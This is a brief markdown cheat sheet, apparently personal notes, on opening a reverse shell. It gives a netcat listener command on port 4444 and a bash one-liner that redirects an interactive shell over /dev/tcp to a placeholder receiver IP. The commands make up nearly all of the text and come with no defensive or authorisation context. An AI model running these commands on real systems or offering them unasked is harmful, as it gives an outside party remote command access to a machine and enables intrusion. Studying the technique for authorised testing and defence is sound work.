# Reverse Shell

How to open a reverse shell

On receiving end, open port with i.e. netcat (nc).

```bash
nc -lvp 4444

```

On sending server, open connection to receiver with

```bash
bash -i >& /dev/tcp/<receiver IP-Address>/4444 0>&1
```